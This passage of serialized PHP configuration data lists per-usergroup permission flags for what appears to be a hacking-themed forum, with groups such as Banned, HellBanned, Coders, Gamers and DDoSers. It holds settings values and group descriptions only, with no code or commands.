:\"1\";s:13:\"canchangename\";s:1:\"1\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"1\";s:15:\"reputationpower\";s:1:\"4\";s:17:\"maxreputationsday\";s:1:\"4\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:4:\"5000\";s:14:\"cancustomtitle\";s:1:\"1\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:2:\"20\";s:13:\"timebtwnposts\";s:2:\"10\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:7;a:73:{s:3:\"gid\";s:1:\"7\";s:4:\"type\";s:1:\"1\";s:5:\"title\";s:6:\"Banned\";s:11:\"description\";s:69:\"The default user group to which members that are banned are moved to.\";s:9:\"namestyle\";s:45:\"{username}\";s:9:\"usertitle\";s:6:\"Banned\";s:5:\"stars\";s:1:\"0\";s:9:\"starimage\";s:15:\"images/star.gif\";s:5:\"image\";s:0:\"\";s:9:\"disporder\";s:1:\"9\";s:13:\"isbannedgroup\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:15:\"canviewprofiles\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"0\";s:10:\"cansendpms\";s:1:\"0\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:1:\"0\";s:15:\"maxpmrecipients\";s:1:\"0\";s:12:\"cansendemail\";s:1:\"0\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"0\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"0\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";s:9:\"canusercp\";s:1:\"0\";s:16:\"canuploadavatars\";s:1:\"0\";s:14:\"canratemembers\";s:1:\"0\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"0\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"0\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"0\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"0\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:8;a:73:{s:3:\"gid\";s:1:\"8\";s:4:\"type\";s:1:\"2\";s:5:\"title\";s:3:\"Bot\";s:11:\"description\";s:20:\"Spiders and Crawlers\";s:9:\"namestyle\";s:45:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"0\";s:9:\"starimage\";s:15:\"images/star.gif\";s:5:\"image\";s:0:\"\";s:9:\"disporder\";s:2:\"10\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"0\";s:10:\"cansendpms\";s:1:\"0\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:1:\"1\";s:15:\"maxpmrecipients\";s:1:\"1\";s:12:\"cansendemail\";s:1:\"0\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"4\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"0\";s:16:\"canuploadavatars\";s:1:\"0\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"1\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"0\";s:11:\"attachquota\";s:4:\"5000\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"0\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"0\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:10;a:73:{s:3:\"gid\";s:2:\"10\";s:4:\"type\";s:1:\"2\";s:5:\"title\";s:10:\"HellBanned\";s:11:\"description\";s:18:\"Hellbanned members\";s:9:\"namestyle\";s:44:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"0\";s:9:\"starimage\";s:16:\"images/star.gif \";s:5:\"image\";s:0:\"\";s:9:\"disporder\";s:1:\"8\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"0\";s:10:\"cansendpms\";s:1:\"0\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:3:\"100\";s:15:\"maxpmrecipients\";s:1:\"5\";s:12:\"cansendemail\";s:1:\"0\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"4\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"0\";s:16:\"canuploadavatars\";s:1:\"0\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"1\";s:17:\"maxreputationsday\";s:1:\"5\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"5\";s:15:\"candisplaygroup\";s:1:\"0\";s:11:\"attachquota\";s:4:\"5000\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"0\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:12;a:73:{s:3:\"gid\";s:2:\"12\";s:4:\"type\";s:1:\"4\";s:5:\"title\";s:6:\"Coders\";s:11:\"description\";s:134:\"This group is based on coding. Members in this group dedicate their time to code pages/programs and help others to learn how to code. \";s:9:\"namestyle\";s:43:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"7\";s:9:\"starimage\";s:22:\"images/stars/grey.png \";s:5:\"image\";s:20:\"images/ub/Coders.png\";s:9:\"disporder\";s:2:\"14\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:3:\"100\";s:15:\"maxpmrecipients\";s:1:\"1\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"5\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:4:\"2880\";}i:13;a:73:{s:3:\"gid\";s:2:\"13\";s:4:\"type\";s:1:\"4\";s:5:\"title\";s:6:\"Unique\";s:11:\"description\";s:67:\"We are Unique. We are a HQ Group. And we have the best HQ members. \";s:9:\"namestyle\";s:44:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"7\";s:9:\"starimage\";s:21:\"images/stars/grey.png\";s:5:\"image\";s:21:\"/images/ub/unique.gif\";s:9:\"disporder\";s:2:\"15\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:3:\"100\";s:15:\"maxpmrecipients\";s:1:\"1\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"1\";s:15:\"reputationpower\";s:1:\"1\";s:17:\"maxreputationsday\";s:1:\"2\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:14;a:73:{s:3:\"gid\";s:2:\"14\";s:4:\"type\";s:1:\"2\";s:5:\"title\";s:6:\"Closed\";s:11:\"description\";s:26:\"Permanently banned members\";s:9:\"namestyle\";s:52:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"0\";s:9:\"starimage\";s:15:\"images/star.gif\";s:5:\"image\";s:0:\"\";s:9:\"disporder\";s:2:\"11\";s:13:\"isbannedgroup\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:15:\"canviewprofiles\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"0\";s:10:\"cansendpms\";s:1:\"0\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:1:\"0\";s:15:\"maxpmrecipients\";s:1:\"0\";s:12:\"cansendemail\";s:1:\"0\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"0\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"0\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";s:9:\"canusercp\";s:1:\"0\";s:16:\"canuploadavatars\";s:1:\"0\";s:14:\"canratemembers\";s:1:\"0\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"0\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"0\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"0\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"0\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"0\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:15;a:73:{s:3:\"gid\";s:2:\"15\";s:4:\"type\";s:1:\"2\";s:5:\"title\";s:8:\"Underage\";s:11:\"description\";s:66:\"People under 14 with parent/legal guardian permission to access LH\";s:9:\"namestyle\";s:10:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"0\";s:9:\"starimage\";s:15:\"images/star.gif\";s:5:\"image\";s:0:\"\";s:9:\"disporder\";s:2:\"13\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:3:\"100\";s:15:\"maxpmrecipients\";s:1:\"1\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"5\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:17;a:73:{s:3:\"gid\";s:2:\"17\";s:4:\"type\";s:1:\"4\";s:5:\"title\";s:6:\"Gamers\";s:11:\"description\";s:132:\"L33THackings Gamers group, We talk about all things game related. If It\'s game Talk, Cheats, Guides, Releases We talk about it here!\";s:9:\"namestyle\";s:44:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"7\";s:9:\"starimage\";s:21:\"images/stars/grey.png\";s:5:\"image\";s:19:\"images/ub/gamer.png\";s:9:\"disporder\";s:2:\"16\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"1\";s:12:\"canvotepolls\";s:1:\"0\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:3:\"100\";s:15:\"maxpmrecipients\";s:1:\"1\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"4\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"1\";s:17:\"maxreputationsday\";s:1:\"5\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"5\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:4:\"5000\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:20;a:73:{s:3:\"gid\";s:2:\"20\";s:4:\"type\";s:1:\"4\";s:5:\"title\";s:7:\"DDoSers\";s:11:\"description\";s:42:\"A group for people who like DDoSing sites.\";s:9:\"namestyle\";s:44:\"{username}\";s:9:\"usertitle\";s:6:\"DDoSER\";s:5:\"stars\";s:1:\"7\";s:9:\"starimage\";s:21:\"images/stars/grey.png\";s:5:\"image\";s:21:\"images/ub/ddosers.gif\";s:9:\"disporder\";s:2:\"18\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:3:\"100\";s:15:\"maxpmrecipients\";s:1:\"1\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s: